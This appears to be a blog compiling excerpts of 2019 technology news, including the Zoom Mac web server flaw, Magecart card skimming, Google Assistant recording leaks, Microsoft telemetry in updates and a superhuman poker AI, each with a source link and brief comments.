Reddit Is Down as the Summer of Outages Continues

Users began to report outages a little over an hour ago. For this writer, the problem first presented as weirdness with Reddit’s login server and front page timeline, but it quickly worsened. Now navigating to reddit.com is rewarding many with 503 errors.

The outage seems to have hit users visiting Reddit on desktop the hardest. Navigating to Reddit through its app on Android and iOS worked just fine for several Gizmodo staffers, and even the Reddit’s status page claims all systems are operational, though it is showing a sharp uptick in error rates for reddit.com.

Screenshot: Reddit Status Detector

If you feel like the internet has been breaking more than usual, you’re not alone. There have been a number of significant outages over the last month.

Google has had at least two major outages, as has Facebook. AT&T also experienced a major outage this month. Hell, even Down Detector has been down.

Source: Reddit Is Down as the Summer of Outages Continues

Microsoft stirs suspicions by adding telemetry spyware to security-only update

Under Microsoft’s rules, what it calls “Security-only updates” are supposed to include, well, only security updates, not quality fixes or diagnostic tools. Nearly three years ago, Microsoft split its monthly update packages for Windows 7 and Windows 8.1 into two distinct offerings: a monthly rollup of updates and fixes and, for those who are want only those patches that are absolutely essential, a Security-only update package.

What was surprising about this month’s Security-only update, formally titled the “July 9, 2019—KB4507456 (Security-only update),” is that it bundled the Compatibility Appraiser, KB2952664, which is designed to identify issues that could prevent a Windows 7 PC from updating to Windows 10.

Among the fierce corps of Windows Update skeptics, the Compatibility Appraiser tool is to be shunned aggressively. The concern is that these components are being used to prepare for another round of forced updates or to spy on individual PCs. The word telemetry appears in at least one file, and for some observers it’s a short step from seemingly innocuous data collection to outright spyware.

My longtime colleague and erstwhile co-author, Woody Leonhard, noted earlier today that Microsoft appeared to be “surreptitiously adding telemetry functionality” to the latest update:

With the July 2019-07 Security Only Quality Update KB4507456, Microsoft has slipped this functionality into a security-only patch without any warning, thus adding the “Compatibility Appraiser” and its scheduled tasks (telemetry) to the update. The package details for KB4507456 say it replaces KB2952664 (among other updates).

Come on Microsoft. This is not a security-only update. How do you justify this sneaky behavior? Where is the transparency now.

I had the same question, so I spent the afternoon poking through update files and security bulletins and trying to get an on-the-record response from Microsoft. I got a terse “no comment” from Redmond.

Source: Microsoft stirs suspicions by adding telemetry files to security-only update | ZDNet

Once installed, a new scheduled task is added to the system under Microsoft > Windows > Application Experience

Windows 10 SFC /scannow Can’t Fix Corrupted Files After Update

Starting today, Windows 10 users are finding that the /sfc scannow feature is no longer working and that it states it found, but could not fix, corrupted Windows Defender PowerShell files.

The Windows System File Checker tool, commonly known as SFC, has a /scannow argument that will check the integrity of all protected Winodws system files and repair any issues that are found.

As of this morning, users in a wildersecurity.com thread have started reporting that when they run sfc /scannow, the program is stating that “Windows Resource Protection found corrupt files but was unable to fix some of them.” I too was able to reproduce this issue on a virtual machine with Windows Defender configured as the main antivirus program.

Source: Windows 10 SFC /scannow Can’t Fix Corrupted Files After Update

Apple removes Zoom’s dodgy hidden web server on your Mac without telling you – shows who really pwns your machine

Apple has pushed a silent update to Macs, disabling the hidden web server installed by the popular Zoom web-conferencing software.

A security researcher this week went public with his finding that the mechanism used to bypass a Safari prompt before entering a Zoom conference was a hidden local web server.

Jonathan Leitschuh focused largely on the fact that a user’s webcam would likely be ON automatically, meaning that a crafty bit of web coding would give an attacker a peek into your room if you simply visit their site.

But the presence of the web server was a more serious issue, especially since uninstalling Zoom did not remove it and the web server would reinstall the Zoom client – which is malware-like behaviour.

[…]

On 9 July the company updated its Mac app to remove the local web server “via a prompted update”.

The next day Apple itself took action, by instructing macOS’s built-in antivirus engine to remove the web server on sight from Macs. Zoom CEO Eric Yuan added on Wednesday:

Apple issued an update to ensure the Zoom web server is removed from all Macs, even if the user did not update their Zoom app or deleted it before we issued our July 9 patch. Zoom worked with Apple to test this update, which requires no user interaction.

Source: Wondering how to whack Zoom’s dodgy hidden web server on your Mac? No worries, Apple’s done it for you • The Register

Kind of scary that Apple can just go about removing software from your machine without any notification

Apple disables Walkie Talkie app due to vulnerability that could allow iPhone eavesdropping

Apple has disabled the Apple Watch Walkie Talkie app due to an unspecified vulnerability that could allow a person to listen to another customer’s iPhone without consent, the company told TechCrunch this evening.

Apple has apologized for the bug and for the inconvenience of being unable to use the feature while a fix is made.

[…]

Earlier this year a bug was discovered in the group calling feature of FaceTime that allowed people to listen in before a call was accepted. It turned out that the teen who discovered the bug, Grant Thompson, had attempted to contact Apple about the issue but was unable to get a response. Apple fixed the bug and eventually rewarded Thompson a bug bounty. This time around, Apple appears to be listening more closely to the reports that come in via its vulnerability tips line and has disabled the feature.

Earlier today, Apple quietly pushed a Mac update to remove a feature of the Zoom conference app that allowed it to work around Mac restrictions to provide a smoother call initiation experience — but that also allowed emails and websites to add a user to an active video call without their permission.

Source: Apple disables Walkie Talkie app due to vulnerability that could allow iPhone eavesdropping | TechCrunch

‘Superhuman’ AI Crushes Poker Pros at Six-Player Texas Hold’em

Computer scientists have developed a card-playing bot, called Pluribus, capable of defeating some of the world’s best players at six-person no-limit Texas hold’em poker, in what’s considered an important breakthrough in artificial intelligence.

Two years ago, a research team from Carnegie Mellon University developed a similar poker-playing system, called Libratus, which consistently defeated the world’s best players at one-on-one Heads-Up, No-Limit Texas Hold’em poker. The creators of Libratus, Tuomas Sandholm and Noam Brown, have now upped the stakes, unveiling a new system capable of playing six-player no-limit Texas hold’em poker, a wildly popular version of the game.

In a series of contests, Pluribus handedly defeated its professional human opponents, at a level the researchers described as “superhuman.” When pitted against professional human opponents with real money involved, Pluribus managed to collect winnings at an astounding rate of $1,000 per hour. Details of this achievement were published today in Science.

[…]

For the new study, Brown and Sandholm subjected Pluribus to two challenging tests. The first pitted Pluribus against 13 different professional players—all of whom have earned more than $1 million in poker winnings—in the six-player version of the game. The second test involved matches featuring two poker legends, Darren Elia and Chris “Jesus” Ferguson, each of whom was pitted against five identical copies of Pluribus.

The matches with five humans and Pluribus involved 10,000 hands played over 12 days. To incentivize the human players, a total of $50,000 was distributed among the participants, Pluribus included. The games were blind in that none of the human players were told who they were playing, though each player had a consistent alias used throughout the competition. For the tests involving a lone human and five Pluribuses, each player was given $2,000 for participating and a bonus $2,000 for playing better than their human cohort. Elia and Ferguson both played 5,000 separate hands against their machine opponents.

In all scenarios, Pluribus registered wins with “statistical significance,” and to a degree the researchers referred to as “superhuman.”

“We mean superhuman in the sense that it performs better than the best humans,” said Brown, who is completing his Ph.D. as a research scientist at Facebook AI. “The bot won by about five big blinds per hundred hands of poker (bb/100) when playing against five elite human professionals, which professionals consider to be a very high win rate. To beat elite professionals by that margin is considered a decisive win.

[…]

Before the competition started, Pluribus developed its own “blueprint” strategy, which it did by playing poker with itself for eight straight days.

“Pluribus does not use any human gameplay data to form its strategy,” explained Brown. “Instead, Pluribus first uses self-play, in which it plays against itself over trillions of hands to formulate a basic strategy. It starts by playing completely randomly. As it plays more and more hands against itself, its strategy gradually improves as it learns which actions lead to winning more money. This is all done offline before ever playing against humans.”

Armed with its blueprint strategy, the competitions could begin. After the first bets were placed, Pluribus calculated several possible next moves for each opponent, in a manner similar to how machines play chess and Go. The difference here, however, is that Pluribus was not tasked to calculate the entire game, as that would be “computationally prohibitive,” as noted by the researchers.

“In Pluribus, we used a new way of doing search that doesn’t have to search all the way to the end of the game,” said Brown. “Instead, it can stop after a few moves. This makes the search algorithm much more scalable. In particular, it allows us to reach superhuman performance while only training for the equivalent of less than $150 on a cloud computing service, and playing in real time on just two CPUs.”

[…]

Importantly, Pluribus was also programmed to be unpredictable—a fundamental aspect of good poker gamesmanship. If Pluribus consistently bet tons of money when it figured it had the best hand, for example, its opponents would eventually catch on. To remedy this, the system was programmed to play in a “balanced” manner, employing a set of strategies, like bluffing, that prevented Pluribus’ opponents from picking up on its tendencies and habits.

Source: ‘Superhuman’ AI Crushes Poker Pros at Six-Player Texas Hold’em

Google admits leaked private voice conversations, decides to clamp down on whistleblowers, not improve privacy

Google admitted on Thursday that more than 1,000 sound recordings of customer conversations with the Google Assistant were leaked by some of its partners to a Belgian news site.

[…]

“We just learned that one of these language reviewers has violated our data security policies by leaking confidential Dutch audio data,” Google product manager of search David Monsees said in a blog post. “Our Security and Privacy Response teams have been activated on this issue, are investigating, and we will take action. We are conducting a full review of our safeguards in this space to prevent misconduct like this from happening again”

Monsees said its partners only listen to “around 0.2 percent of all audio snippets” and said they are “not associated with user accounts,” even though VRT was able to figure out who was speaking in some of the clips.

Source: Google admits leaked private voice conversations

NB the CNBC  article states that you can delete old conversations, but we know that’s not the case for transcribed Alexa conversations and we know that if you delete your shopping emails from Gmail, Google keeps your shopping history.

How American Corporations Are Policing Online Speech Worldwide

In the winter of 2010, a 19-year-old Moroccan man named Kacem Ghazzali logged into his email to find a message from Facebook informing him that a group he had created just a few days prior had been removed from the platform without explanation. The group, entitled “Jeunes pour la séparation entre Religion et Enseignement” (or “Youth for the separation of religion and education”), was an attempt by Ghazzali to organize with other secularist youth in the pious North African kingdom, but it was quickly thwarted. When Ghazzali wrote to Facebook to complain about the censorship, he found his personal profile taken down as well.

Back then, there was no appeals system, but after I wrote about the story, Ghazzali was able to get his accounts back. Others haven’t been so lucky. In the years since, I’ve heard from hundreds of activists, artists, and average folks who found their social media posts or accounts deleted—sometimes for violating some arcane proprietary rule, sometimes at the order of a government or court, other times for no discernible reason at all.

The architects of Silicon Valley’s big social media platforms never imagined they’d someday be the global speech police. And yet, as their market share and global user bases have increased over the years, that’s exactly what they’ve become. Today, the number of people who tweet is nearly the population of the United States. About a quarter of the internet’s total users watch YouTube videos, and nearly one-third of the entire world uses Facebook. Regardless of the intent of their founders, none of these platforms were ever merely a means of connecting people; from their early days, they fulfilled greater needs. They are the newspaper, the marketplace, the television. They are the billboard, the community newsletter, and the town square.

And yet, they are corporations, with their own speech rights and ability to set the rules as they like—rules that more often than not reflect the beliefs, however misguided, of their founders.

Source: How American Corporations Are Policing Online Speech Worldwide

T-Mobile Says Customers Can’t Sue Because It Violates Its ToS

T-Mobile screwed over millions of customers when it collected their geolocation data and sold it to third parties without their consent. Now, two of these customers are trying to pursue a class-action lawsuit against the company for the shady practice, but the telecom giant is using another shady practice to force them to settle their dispute behind closed doors.

On Monday, T-Mobile filed a motion to compel the plaintiffs into arbitration, which would keep the complaint out of a public courtroom. See, when you sign a contract or agree to a company’s terms of service with a forced arbitration clause, you are waiving your right to a trial by jury and oftentimes to pursue a class-action lawsuit at all. Settling a dispute in arbitration means having it heard by a third party behind closed doors. And an arbitration clause is buried in T-Mobile’s fine print.

T-Mobile’s terms of service state that customers do have the option to opt out of arbitration, which is buried within the agreement and states that they “must either complete the opt out form on this website or call toll-free 1-866-323-4405 and provide the information requested.” They also only have 30 days to do so after they have activated their service. After that brief time period, users are no longer eligible to opt out.

The plaintiffs, Shawnay Ray and Kantice Joyner of Maryland, filed the class-action complaint against T-Mobile in May. Verizon, Sprint, and AT&T were all also hit with lawsuits that same month for selling customer location data. “The telecommunications carriers are the beginning of a dizzying chain of data selling, where data goes from company to company, and ultimately ends up in the hands of literally anybody who is looking,” the complaint against T-Mobile states. The comment is largely referring to a Vice investigation that found that the phone carriers sold real-time location data to middlemen and that this data sometimes eventually ended up with bounty hunters.

Source: T-Mobile Says Customers Can’t Sue Because It Violates Its ToS

Google contractors are secretly listening to your Assistant and Home recordings

Not only is your Google Home device listening to you, a new report suggests there might be a Google contractor who’s listening as well. Even if you didn’t ask your device any questions, it’s still sending what you say to the company, who allow an actual person to collect data from it.

[…]

VRT, with the help of a whistleblower, was able to listen to some of these clips and subsequently heard enough to discern the addresses of several Dutch and Belgian people using Google Home — in spite of the fact some hadn’t even uttered the words “Hey Google,” which are supposed to be the device’s listening trigger.

The person who leaked the recordings was working as a subcontractor to Google, transcribing the audio files for subsequent use in improving its speech recognition. They got in touch with VRT after reading about Amazon Alexa keeping recordings indefinitely.

According to the whistleblower, the recordings presented to them are meant to be carefully annotated, with notes included about the speakers presumed identity and age. From the sound of the report, these transcribers have heard just about everything. Personal information? Bedroom activities? Domestic violence? Yes, yes, and yes.

While VRT only listened to recordings from Dutch and Belgian users, the platform the whistleblower showed them had recordings from all over the world – which means there are probably thousands of other contractors listening to Assistant recordings.

The VRT report states that the Google Home Terms of Service don’t mention that recordings might be listened to by other humans.

The report did say the company tries to anonymize the recordings before sending them to contractors, identifying them by numbers rather than user names. But again, VRT was able to pick up enough data from the recordings to find the addresses of the users in question, and even confront some of the users in the recordings – to their great dismay.

Google’s defense to VRT was that the company only transcribes and uses “about 0.2% of all audio clips,” to improve their voice recognition technology.

Source: Google contractors are secretly listening to your Assistant recordings

Prenda Law bosses in jail for seeding porn videos to d/l sites and then suing the downloaders

One of the former attorneys behind dodgy copyright-demand factory Prenda Law has been sentenced to 60 months in prison. Yes, the same Prenda Law that seeded file-sharing networks with smut flicks it owned the rights to in order to extract eye-watering copyright infringement settlements from downloaders.

Judge Joan Ericksen, of a US federal district court in Minnesota, on Tuesday this week handed down the five-year term, along with two years of supervised release and a $1,541,527.37 restitution bill, after Steele copped to one count each of conspiracy to commit money laundering and conspiracy to commit mail and wire fraud. While technically given two 60-month sentences, Steele, 48, is being allowed to serve both terms at the same time.

Steele, who has since been disbarred, admitted that from 2011 to 2014 he and co-conspirator Paul Hansmeier, operating as Prenda Law, set up a series of shell companies and studios that either purchased the rights to existing pornographic films or funded the making of original films with the intent of anonymously sticking the dirty movies on the Pirate Bay.

The duo then tracked down people who had downloaded the films and threatened them with copyright infringement suits unless the target agreed to pay out a $3,000 settlement. When the piracy scam started to flounder, the pair took things a step further by accusing targets of hacking their shell companies’ machines.

“To facilitate their phony ‘hacking’ lawsuits, the defendants recruited individuals who had been caught downloading pornography from a file-sharing website, to act as ruse ‘defendants’,” US prosecutors noted.

“These ruse defendants agreed to be sued and permit Steele and Hansmeier to conduct early discovery against their supposed ‘co-conspirators’ in exchange for Steele and Hansmeier waiving their settlement fees.”

Both lawyers would eventually be found out, and charged with fraud and money laundering for their roles in the scheme. By the time the operation was dismantled, it is estimated the duo was able to extort nearly $3m in payouts from randy web-surfers.

While five years behind bars can hardly be considered a slap on the wrist, Steele’s willingness to cooperate with authorities allowed him to win a considerably lighter term than his co-conspirator 37-year-old Hansmeier, who last month was sentenced to 14 years incarceration for convictions on the same set of charges. ®

Source: Prenda Law boss John Steele to miss 2020 Olympics… unless they show it in prison • The Register

AI Trained on Old Scientific Papers Makes Discoveries Humans Missed

In a study published in Nature on July 3, researchers from the Lawrence Berkeley National Laboratory used an algorithm called Word2Vec sift through scientific papers for connections humans had missed. Their algorithm then spit out predictions for possible thermoelectric materials, which convert heat to energy and are used in many heating and cooling applications.

The algorithm didn’t know the definition of thermoelectric, though. It received no training in materials science. Using only word associations, the algorithm was able to provide candidates for future thermoelectric materials, some of which may be better than those we currently use.

[…]

To train the algorithm, the researchers assessed the language in 3.3 million abstracts related to material science, ending up with a vocabulary of about 500,000 words. They fed the abstracts to Word2vec, which used machine learning to analyze relationships between words.

“The way that this Word2vec algorithm works is that you train a neural network model to remove each word and predict what the words next to it will be,” Jain said. “By training a neural network on a word, you get representations of words that can actually confer knowledge.”

Using just the words found in scientific abstracts, the algorithm was able to understand concepts such as the periodic table and the chemical structure of molecules. The algorithm linked words that were found close together, creating vectors of related words that helped define concepts. In some cases, words were linked to thermoelectric concepts but had never been written about as thermoelectric in any abstract they surveyed. This gap in knowledge is hard to catch with a human eye, but easy for an algorithm to spot.

After showing its capacity to predict future materials, researchers took their work back in time, virtually. They scrapped recent data and tested the algorithm on old papers, seeing if it could predict scientific discoveries before they happened. Once again, the algorithm worked.

In one experiment, researchers analyzed only papers published before 2009 and were able to predict one of the best modern-day thermoelectric materials four years before it was discovered in 2012.

This new application of machine learning goes beyond materials science. Because it’s not trained on a specific scientific dataset, you could easily apply it to other disciplines, retraining it on literature of whatever subject you wanted. Vahe Tshitoyan, the lead author on the study, says other researchers have already reached out, wanting to learn more.

“This algorithm is unsupervised and it builds its own connections,” Tshitoyan said. “You could use this for things like medical research or drug discovery. The information is out there. We just haven’t made these connections yet because you can’t read every article.”

Source: AI Trained on Old Scientific Papers Makes Discoveries Humans Missed – VICE

Scientists 3D-print human skin and bone for Mars astronauts

Scientists from the University Hospital of Dresden Technical University in Germany bio-printed skin and bone samples upside down to help determine if the method could be used in a low-gravity environment. It worked. ESA released videos of the printing in action.

The skin sample was printed using human blood plasma as a “bio ink.” The researchers added plant and algae-based materials to increase the viscosity so it wouldn’t just fly everywhere in low gravity.

“Producing the bone sample involved printing human stem cells with a similar bio-ink composition, with the addition of a calcium phosphate bone cement as a structure-supporting material, which is subsequently absorbed during the growth phase,” said Nieves Cubo, a bioprinting specialist at the university.

These samples are just the first steps for the ESA’s ambitious 3D bio-printing project, which is investigating what it would take to equip astronauts with medical and surgical facilities to help them survive and treat injuries on long spaceflights and on Mars.

“Carrying enough medical supplies for all possible eventualities would be impossible in the limited space and mass of a spacecraft,” said Tommaso Ghidini, head of ESA’s Structures, Mechanisms and Materials Division. “Instead, a 3D bioprinting capability will let them respond to medical emergencies as they arise.”

Source: Scientists 3D-print human skin and bone for Mars astronauts – CNET

Study finds that parental ‘memory’ is inherited across generations

“While neuronally encoded behavior isn’t thought to be inherited across generations, we wanted to test the possibility that environmentally triggered modifications could allow ‘memory’ of parental experiences to be inherited,” explains Julianna “Lita” Bozler, a Ph.D. candidate in the Bosco Lab at the Geisel School of Medicine, who served as lead author on the study.

When exposed to —which deposit their eggs into and kill the larvae of fruit flies—Drosophila melanogaster females are known to shift their preference to food containing ethanol as an egg laying substrate, which protects their larvae from wasp infection.

For the study, the fruit flies were cohabitated with female wasps for four days before their eggs were collected. The embryos were separated into two cohorts—a wasp-exposed and unexposed (control) group—and developed to maturity without any contact with adult flies or wasps. One group was used to propagate the next generation and the other was analyzed for ethanol preference.

“We found that the original wasp-exposed flies laid about 94 percent of their eggs on ethanol food, and that this behavior persisted in their offspring, even though they’d never had direct interaction with wasps,” says Bozler.

The ethanol preference was less potent in the first-generation offspring, with 73 percent of their eggs laid on ethanol food. “But remarkably, this inherited ethanol preference persisted for five generations, gradually reverting back to a pre-wasp exposed level,” she says. “This tells us that inheritance of ethanol preference is not a permanent germline change, but rather a reversible trait.”

Importantly, the research team determined that one of the critical factors driving ethanol preference behavior is the depression of Neuropeptide-F (NPF) that is imprinted in a specific region of the female fly’s brain. While this change, based in part on visual signals, was required to initiate transgenerational inheritance, both male and female progeny were able to pass on preference to their offspring.

Source: Study finds that parental ‘memory’ is inherited across generations

Microsoft Action Pack software no longer for all sellers of MS products, reseller rebellion

More than 2,500 resellers and integrators have signed a petition opposing Microsoft’s intention to remove free software licences granted to members of the channel to run their business.The changes are described here:Effective July 1, 2020, we will retire the internal use rights (IUR) association with the product licenses partners receive in the Microsoft Action Pack and included with a competency. Product license use rights will be updated to be used for business development scenarios such as demonstration purposes, solution/services development purposes, and internal training.Beginning October 1, 2019, the product licenses included with competencies will be specific to the competency you attain. Please review the benefits you will receive with your competency in Partner Center at time of purchase. Additional licenses can be purchased through commercial licensing to run your business.There are a huge number of partners resellers, most of them small businesses, who recommend, resell and support customers running Microsoft wares or services. In 2017, Microsoft said that “our partners employ more than 17 million people around the world”.The barriers to entry are low and companies who sign up can qualify for a range of competencies, starting with an “Action Pack” subscription that comes with a wide range of benefits, such as five Office 365 seats, five Dynamics 365 licences, 2-core SQL Server, ten Windows 10 Enterprise packages, $100 per month Azure credit and so on. The Action Pack costs around £350 per year but represents excellent value if you would otherwise have to purchase the licences. The same is true of the higher levels, Silver and Gold competencies, which command a higher fee but provide a wider range of benefits.Resellers are not allowed to resell these specific licences, but critically, they do allow use for “internal business purposes”. Smaller Microsoft channel firms have been able to operate their businesses, in large part, using these subsidised licences.That offer is now ending. “We will retire product licenses for internal use purposes on July 1 2020,” stated the Microsoft Partner Network (MPN) guide.There are more changes too, and none of them good for partners. Free support incidents are being withdrawn. “Starting August 2019, on-premise Product Support incidents will no longer be available for Action Pack and competencies,” warned Microsoft.In addition, the matching of cloud benefits to specific competencies means reduced benefits. Dynamics 365 seats, for example, will now only be available to partners with the Cloud Business Applications Competency, instead of being doled out to all.

Source: Microsoft middlemen rebel against removal of free software licences • The Register

Over 90 Million Records Leaked by Chinese Public Security Department

A publicly accessible and unsecured ElasticSearch server owned by the Jiangsu Provincial Public Security Department of the Chinese province Jiangsu leaked two databases containing over 90 million people and business records.

Jiangsu (江苏省) is an eastern-central coastal Chinese province with a population of over 80 million and an urban population of more than 55 million accounting for 68.76% of its total population according to a 2018 population census from the National Bureau of Statistics, which makes it the fifth most populous province in China.

Provincial public security departments are “functional organization under the dual leadership of Provincial Government and the Ministry of Public Security in charge of the whole province’s public security work.”

The two now secured databases contained than 26 GB of data in the form of personally identifiable information (PII) names, birth dates, genders, identity card numbers, location coordinates, as well as info on city_relations, city_open_id, and province_open_id for individuals.

In the case of businesses, the records included business IDs, business types, location coordinates, city_open_id, and memos designed to track if the owner of the business is known.

Besides the two exposed ElasticSearch databases, the Jiangsu Provincial Public Security Department also had a Public Security Network admin console that required a valid user/password combo for access, as well as a publicly-accessible Kibana installation running on the server which would help browse and analyze the stored data using a GUI-based interface.

However, unlike other cases of exposed Kibana installations, this one was not fully configured seeing that, once loaded in a web browser, it would go straight to the “Create index pattern page.”

Source: Over 90 Million Records Leaked by Chinese Public Security Department

Magento webshop Automated Magecart Campaign Hits Over 960 Breached Stores

A large-scale payment card skimming campaign that successfully breached 962 e-commerce stores was discovered today by Magento security research company Sanguine Security.

The campaign seems to be automated according to Sanguine Security researcher Willem de Groot who told BleepingComputer that the card skimming script was added within a 24-hour timeframe. “It would be nearly impossible to breach 960+ stores manually in such a short time,” he added.

Even though no information on how such automated Magecart attacks against e-commerce websites would work was shared by Sanguine Security, the procedure would most likely entail scanning for and exploiting security flaws in the stores’ software platform.

“Have not gotten confirmation yet, but it seems that several victims were missing patches against PHP object injection exploits,” also said de Groot.

While details on how the online stores were breached are still scarce given that the logs are still being analyzed, the JavaScript-based payment data skimmer script was decoded and uploaded by the security company to GitHub Gist.

As shown from its source code, the skimmer was used by the attackers to collect e-commerce customers’ payment info on breached stores, including full credit card data, names, phones, and addresses.

Source: Automated Magecart Campaign Hits Over 960 Breached Stores

Canon Stabs Tradition in the Back With Camera That Supports Vertical Video

Canon’s G7 X line has long been a favorite of photographers who wanted a travel-friendly camera that could still capture high-quality images. But with the rise of smartphones and the decline of point-and-shoots, Canon began pushing its compact cameras towards vloggers, who I’ve seen use cameras like the G7 X and Sony’s RX100 line as a backup or more portable alternative to a big mirrorless or DSLR cam. After all, when you’re attaching a camera to a gimbal or the end of a GorillaPod, every extra bit of lightness make a camera easier to handle.

So for the new G7 X III, it seems the influencers have influenced Canon because one of the camera’s new standout features is the ability to record vertical videos without rotating the footage in post natively. Using a new built-in gyro, the G7 X III can determine the camera’s orientation and then embed that info into a clip’s metadata, which means filming vertical videos for your Instagram stories on the G7 X III is as simple as turning the camera sideways.

And if that’s enough not to excite attendees of VidCon 2019—the vlogger convention where the $750 G7 X is making its official debut—Canon also gave the camera the ability to livestream video directly to YouTube over wifi via the company’s Image Gateway software. The G7 X III also comes with a built-in microphone jack for vloggers who aren’t satisfied with the camera’s on-board audio, and a 3-inch touchscreen that can flip up 180-degree so that vloggers can check their composition while they’re filming themselves.

Source: Canon Stabs Tradition in the Back With Camera That Supports Vertical Video

Indoor carbon dioxide levels could be a health hazard, scientists warn

Indoor levels of carbon dioxide could be clouding our thinking and may even pose a wider danger to human health, researchers say.

While air pollutants such as tiny particles and nitrogen oxides have been the subject of much research, there have been far fewer studies looking into the health impact of CO2.

However, the authors of the latest study – which reviews current evidence on the issue – say there is a growing body of research suggesting levels of CO2 that can be found in bedrooms, classrooms and offices might have harmful effects on the body, including affecting cognitive performance.

“There is enough evidence to be concerned, not enough to be alarmed. But there is no time to waste,” said Dr Michael Hernke, a co-author of the study from the University of Wisconsin-Madison, stressing further research was needed.

Writing in the journal Nature Sustainability, Hernke and colleagues report that they considered 18 studies of the levels of CO2 humans are exposed to, as well as its health impacts on both humans and animals.

Traditionally, the team say, it had been thought that CO2 levels would need to reach a very high concentration of at least 5,000 parts per million (ppm) before they would affect human health. But a growing body of research suggests CO2 levels as low as 1,000ppm could cause health problems, even if exposure only lasts for a few hours.

The team say crowded or poorly ventilated classrooms, office environments and bedrooms have all been found to have levels of CO2 that exceed 1,000ppm, and are spaces that people often remain in for many hours at a time. Air-conditioned trains and planes have also been found to exceed 1,000ppm.

[…]

The team found a number of studies have looked at the impact of such levels on human cognitive performance and productivity. In one study of 24 employees, cognitive scores were 50% lower when the participants were exposed to 1,400ppm of CO2 compared with 550ppm during a working day.

The team additionally looked at the impact of CO2 levels on animals, finding that a few hours’ exposure to 2,000 ppm was linked to inflammatory responses that could lead to damage to blood vessels. There is also tentative evidence suggesting that prolonged exposure to levels between 2,000 and 3,000ppm is linked to effects including stress, kidney calcification and bone demineralisation.

Source: Indoor carbon dioxide levels could be a health hazard, scientists warn | Environment | The Guardian

Another reason to limit creation of it

Serious Security Flaw With Teleconferencing App Zoom Allows Websites to Hijack Mac Webcams – and you can’t fix it by uninstalling

On Monday, security researcher Jonathan Leitschuh publicly disclosed a serious zero-day vulnerability in conferencing software Zoom—which apparently achieves its click-to-join feature, which allows users to go directly to a video meeting from a browser link, on Mac computers by installing a local web server running as a background process that “accepts requests regular browsers wouldn’t,” per the Verge. As a result, Zoom could be hijacked by any website to force a Mac user to join a call without their permission, and with webcams activated unless a specific setting was enabled.

Worse, Leitschuh wrote that the local web server persists even if Zoom is uninstalled and is capable of reinstalling the app on its own, and that when he contacted the company they did little to resolve the issues.

In a Medium post on Monday, Leitschuh provided a demo in the form of a link that, when clicked, took Mac users who have ever installed the app to a conference room with their video cameras activated (it’s here, if you must try yourself). Leitschuh noted that the code to do this can be embedded in any website as well as “in malicious ads, or it could be used as a part of a phishing campaign.” Additionally, Leitschuh wrote that even if users uninstall Zoom, the insecure local web server persists and “will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage.”

This implementation leaves open other nefarious ways to abuse the local web server, per the Verge:

Turning on your camera is bad enough, but the existence of the web server on their computers could open up more significant problems for Mac users. For example, in an older version of Zoom (since patched), it was possible to enact a denial of service attack on Macs by constantly pinging the web server: “By simply sending repeated GET requests for a bad number, Zoom app would constantly request ‘focus’ from the OS,” Leitschuh writes.

According to Leitschuh, he contacted Zoom on March 26, saying he would disclose the exploit in 90 days. Zoom did issue a “quick fix” patch that only disabled “a meeting creator’s ability to automatically enable a participants video by default,” he added, though this was far from a complete solution (and did nothing to negate the “ability for an attacker to forcibly join to a call anyone visiting a malicious site”) and only came in mid-June.

On July 7, he wrote, a “regression in the fix” caused it to no longer work, and though Zoom issued another patch on Sunday, he was able to create a workaround.

Source: Serious Security Flaw With Teleconferencing App Could Allow Websites to Hijack Mac Webcams

More than 1,000 Android apps harvest data even after you deny permissions

Permissions on Android apps are intended to be gatekeepers for how much data your device gives up. If you don’t want a flashlight app to be able to read through your call logs, you should be able to deny that access. But even when you say no, many apps find a way around: Researchers discovered more than 1,000 apps that skirted restrictions, allowing them to gather precise geolocation data and phone identifiers behind your back.

[…]

Researchers from the International Computer Science Institute found up to 1,325 Android apps that were gathering data from devices even after people explicitly denied them permission. Serge Egelman, director of usable security and privacy research at the ICSI, presented the study in late June at the Federal Trade Commission’s PrivacyCon.

“Fundamentally, consumers have very few tools and cues that they can use to reasonably control their privacy and make decisions about it,” Egelman said at the conference. “If app developers can just circumvent the system, then asking consumers for permission is relatively meaningless.”

[…]

Egelman said the researchers notified Google about these issues last September, as well as the FTC. Google said it would be addressing the issues in Android Q, which is expected to release this year.

The update will address the issue by hiding location information in photos from apps and requiring any apps that access Wi-Fi to also have permission for location data, according to Google.

[…]

Researchers found that Shutterfly, a photo-editing app, had been gathering GPS coordinates from photos and sending that data to its own servers, even when users declined to give the app permission to access location data.

[…]

Some apps were relying on other apps that were granted permission to look at personal data, piggybacking off their access to gather phone identifiers like your IMEI number. These apps would read through unprotected files on a device’s SD card and harvest data they didn’t have permission to access. So if you let other apps access personal data, and they stored it in a folder on the SD card, these spying apps would be able to take that information.

While there were only about 13 apps doing this, they were installed more than 17 million times, according to the researchers. This includes apps like Baidu’s Hong Kong Disneyland park app, researchers said.

Source: More than 1,000 Android apps harvest data even after you deny permissions – CNET

UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt

The UK Information Commissioner’s Office has warned BA it faces a whopping £183.39m following the theft of million customer records from its website and mobile app servers.

The record-breaking fine – more or less the lower end of the price of one of the 747-400s in BA’s fleet – under European General Data Protection Regulation (GDPR), represents 1.5 per cent of BA’s world-wide revenue in 2017.

Information Commissioner Elizabeth Denham said: “People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

The breach hit almost 500,000 people. The ICO statement reveals the breach is believed to have started in June 2018, previous statements from BA said it began in late August. The data watchdog described the attack as diverting user traffic from BA’s site to a fraudulent site.

ICO investigators found a variety of information was compromised including log-in details, card numbers, names, addresses and travel information.

Sophisticated card skimming group Magecart, which also hit Ticketmaster, was blamed for the data slurp. The group is believed to have exploited third party scripts, possibly modified JavaScript, running on BA’s site to gain access to the airline’s payment system.

Such scripts are often used to support marketing and data tracking functions or running external ads.

The Reg revealed that BA parent company IAG was in talks with staff to outsource cyber security to IBM just before the hack was carried out.

Source: UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt • The Register

AMD Ryzen 7 3700X + Ryzen 9 3900X Offer Incredible Linux Performance – if you can get it to boot. Which newer distros seemingly can’t

On newer Linux distributions, there’s a hard regression either within the kernel but more likely some cross-kernel/user-space interaction issue leaving newer Linux distributions unbootable.

